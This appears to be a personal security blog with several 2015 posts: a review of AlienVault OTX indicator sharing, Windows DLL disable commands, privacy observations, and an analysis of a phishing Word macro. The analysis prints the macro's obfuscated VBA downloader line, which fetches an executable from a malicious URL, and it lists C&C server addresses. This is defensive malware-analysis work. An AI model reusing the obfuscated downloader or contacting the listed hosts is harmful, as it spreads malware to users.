Monday, December 7, 2015

AlienVault Open Threat eXchange Platform

Indicator Sharing

I am currently working on a ISAC and one of the nice things about an ISAC is that the organizations involved can share information about the attacks they encounter. I've been trying out AlienVault OTX during the month as a platform for public indicator sharing.

The reason why I did not set up my own platform , like a MISP instance, is that the ISAC right now needs to focus on building trust between the parties involved. The OTX allows me to demonstrate the value of indicator sharing in a very simple way.

The AlienVault OTX Platform

As a test case I decided to go with something everybody can experience when connected to the Internet, SSH scans. By experience I know that there are regular scans and the classic ports are TCP/22 and TCP/2222.

There are two ways to interact with the platform, either through the API or the web interface. I chose the latter since I wanted to know if the platform is actually usable for small organizations with a limited amount of resources and knowledge about programming against an API. I must say I was amazed about how easy the good people of AlienVault made it.

When you open the platform you get a dashboard that looks like this:

 

Creating a new pulse

When you want to share information you create a pulse. You can either create one from a copy-paste or manually create the indicators.

 

The exctractor parses the values you paste and tries to detect what the data types are for the submitted data. Since I have only submitted IPv4 indicators I can't say I really tested it but except for one IP it was always spot on. The reason why it asked me to verify that IPv4 address is because it actually looks like a software version number.




When you create an indicator manually you select the type (IPv4,  domain, URL, FileHash-MD5, ...) and enter the value in the indicator field. This works more slowly but is of course more accurate. I tried to do things like double submits in a same pulse and indicate no type but it gently points out the error.

Sharing The Data

Once you have submitted your data the platform asks you how you want to share it.


You can set a TLP label to indicate how the data should be handled and if the data is public or private. I have only published public TLP Green data. One of the things missing I think is that you can't create groups between whom you can share your data.

The tags are handy since you can immediately create context to it. The data I've submitted for example is all SSH traffic so I tagged it with SSH.




You can also add references to a pulse, I haven't used since I credited my external sources in the description, which according to me is a rather logical thing to do.

The Indicator Summary

After you've submitted your pulse a summary is generated.



The first part of the summary is a handy abstract of the number of related pulses it found in the database, the number of indicators, the classification and how many people are subscribed to it.

A fun part for management is the country attribution but as we know a computer in China might be hacked by a Belgian who first connected to another system in Brazil. It doesn't indicate where the bad guy is, it just indicates where the connection comes from according to the GeoIP database of AlienVault.

The next part of the page are the indicators of compromise you just entered. But the last part is the interesting part.



The related pulses are the pulses already in the system that share some of the indicators. What I would have liked is to see how many indicators are shared. When you click on the pulse you get the actual pulse. It would have been nice if it indicated what the shared and non-shared indicators are but it is unfortunately not the case.

 

Data Quality

The worth of a system is as always the quality of the data you put into it. I've been a DBA in the past and quite often people where complaining about the CRM database containing "low quality" data. The irony was of course that usually they were the ones that had inputted it in the first place.

 

Public Data is Public

To give you a good idea of the data submitted you can actually see the public data without an account.

 

Dashboards

AlienVault is a commercial company and thus they need to do some marketing. One of the nice things to show to convince people about sharing data are the public dashboards:

 

Reputation Monitor

As an incident responder it is part of the job but it remains a painful experience when somebody has to tell you that you are compromised. One of the resulting free services of the OTX platform is the reputation monitor where you can indicate what your IP addresses and domains are so OTX can notify you when it got some bad news for you.

Account Issues

In the beginning of November I had some issues with my account but with the help of Bill Smartt these issues were dealt with.

Conclusion

Although I have points of critic and I haven't shared them with AlienVault yet, I must say I am rather impressed by the platform. I will try to play with the API in the near future and do a follow up post when I am done.

My ex-colleague Koen Van Impe has written a nice piece on MISP and IBM's X-Force Exchange. If you are interested in the topic, definitely have a look at his guest post on the securityintelligence blog.

I just want to point out one last thing, data remains data, only you can provide the operational environment context and thus use the data coming from these platforms wisely.

If you are looking for the IOC's I publish you can find them at https://otx.alienvault.com/erik/

Monday, August 31, 2015

Uploading to Google Mail ... a random obeservation

Hello,

Last week I was investigating something related to Gmail. I needed to upload a picture from a web server.

When you create an e-mail and want to include an image you click on the little icon and tell it is located on the web server.

What I noticed is that when the image is called 1.gif, Google will try every character so it tried to find 1, 1.g, 1.gi and 1.gif.

I would have expected them to wait until I stopped typing but apparently not. Yes, sometimes browsing a log is interesting.

Tuesday, August 4, 2015

Facebook profile delete but not entirely it seems ...

In April 2015 I decided to get rid of my Facebook profile. I first downloaded a report to see what they had about me and then deleted the profile. One can assume that the good people that work there keep their promise and delete the profile.

I am currently working on a slides for a presentation about securing your Facebook account and setting up your privacy settings as restrictive as possible. Since I had no account I needed to make a temporary account, with a fake first and last name (I know against the EULA), and used the same e-mail address than the account deleted in April.

One can suppose that the 'old' data is gone but interestingly every friend Facebook proposes was in the friend list I had before.

I can only come to one conclusion and that is that they do not actually delete everything otherwise those friend proposals should have been random strangers (maybe living in the same town).

Wednesday, July 22, 2015

DLL Voodoo: register, unregister, enable and disable a DLL

DLLs are files on the Microsoft Windows Operating System that offer shared functionality to multiple applications (that is my one-phrase definition). To see what DLLs are used by an executable you can use a utility like dependency walker.

Before Windows can use the DLL it needs to be registered. Remember that in a 32-bit environment the a standard location for DLLs is %windir%\system32 and on 64-bit systems you have to take into account that the 64-bit version is stored in %windir%\syswow64.

To register a DLL:
C:\Windows\System32\regsvr32 filename.dll

To unregister a DLL:
C:\Windows\System32\regsvr32 -u path\filename.dll

This is something I learned being a sysadmin a while back but what I learned this week with the Security Bulletin MS15-078 is how to disable them by renaming them and then re-enabling this.

Disabling the dll:
cd dir_path_of_dll
C:\Windows\System32\takeown.exe /f filename.dll
C:\Windows\System32\icacls.exe filename.dll  /save  filename.dll.acl
C:\Windows\System32\icacls.exe filename.dll  /grant  Administrators:(F)
rename filename.dll  x-filename.dll

You need a reboot of the OS to take effect.
 
Enabling the dll:
rename x-filename.dll filename.dll
C:\Windows\System32\icacls.exe filename.dll /setowner "NT SERVICE\TrustedInstaller"
C:\Windows\System32\icacls.exe filename.dll /restore filename.dll.acl

You need a reboot of the OS to take effect.

Friday, June 12, 2015

3267298_2015061035.doc - MD5: 8ca62e90fea72d491a3933597b51d19f

Today a quick post about a piece of malware that I analyzed a couple of days ago. It came to the victim via mail. What was new was that it posed as a bill from a Belgian ISP called EDPnet and the e-mail was written in Dutch without any spelling errors.

It seemed a very legitimate e-mail actually coming from EDPnet although the IP address of the sender gave it away that the sender was from Brazil:



Received: from user-186-237-165-130.inova.net.br (186.237.165.130)


MIME-Version: 1.0


To:

Date: Tue, 9 Jun 2015 04:00:46 -0200

Subject: Uw edpnet factuur 2015061035

As attachment there was a word document with a macro contained in it. The MD5 of the attachment was 8ca62e90fea72d491a3933597b51d19f. At the time of analysis there were only 2 AV's on virustotal that recognized it. The first submission was at 2015-06-09 07:20:08 UTC and the codepage is Cyrillic.

I used OfficeMalScanner by  Frank Boldewin to dump out the macro code:

C:\>OfficeMalScanner.exe 3267298_2015061035.doc info

Interestingly it dumped out 5 files:
  • Module1
  • Module3
  • Module4
  • Module5
  • ThisDocument
 Module1 is written in English and contains well documented code. In the code we found the following

 If InStr(1, d.Application.OperatingSystem, "NT") Then
        '
        ' Use this line with Windows NT:
        '
        winDrive = Left(Environ("WINDIR"), 3)
        Shell winDrive & "Program Files\Windows NT\dialer.exe", 1
    Else
        '
        ' Use this line with Windows 95/98:
        '
        winFolder = Environ("WINDIR")
        Shell winFolder & "\dialer.exe", 1
    End If


As you can make up from the comments, it is code that dates from a while back.

In Module3 we have again very nicely documented code written in English, the coding style resembles the code from Module1.

Module4 and Module5 have clean code but contains the malicious code. It uses the same principle as other malware. It starts with the creation of an XMLHTTP-object and then fetches the malware. The code for fetching the malware is:

CallByName HOPPOJJ2233, Chr(79) & Chr(112) & "e" & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), Chr(104) & "t" & "t" & Chr(112) & Chr(58) & "/" & Chr(47) & "p" & Chr(122) & "i" & "e" & Chr(110) & Chr(116) & Chr(97) & "r" & Chr(97) & Chr(46) & Chr(112) & Chr(108) & Chr(47) & Chr(52) & Chr(50) & "/" & Chr(49) & Chr(49) & ".e" & Chr(120) & Chr(101), False


It translates to a GET of hxxp://pzientara.pl/42/11.exe. Unfortunately I didn't get my hands on this executable but when analyzing the log files interestingly the victims used the same url (since they received the same Word document) but downloaded it from different IP addresses in a time span of less than 30 minutes. The IP addresses where:
  • 87.98.239.19
  • 178.238.237.230
  • 5.39.61.17 
Since I had victim machines at my disposal I had a look at what the the C&C-servers where and found they where making outbound connections to:
  • 173.230.130.172:2443
  • 31.186.99.250:8443
  • 94.23.53.23:2443
When we look at the IP 87.98.239.19 in VirusTotal's Passive DNS we see that there were multiple samples hosted by the same naming logic namely hxxp://pzientara.pl/42/11.exe. and hxxp://pzientara.pl/15/10.exe.

Analysis of  the IP 178.238.237.230 in VirusTotal's Passive DNS gives us no result for hxxp://pzientara.pl/42/11.exe.

Finally the IP address 5.39.61.17 in VirusTotal's Passive DNS did not give any results for hxxp://pzientara.pl/42/11.exe either.


As last idea I wanted to have a look at the geographical spreading of the C&C servers. We see that is in the 173.230.130.172 is in USA, 31.186.99.250 is in Russia and 94.23.53.23 is in France.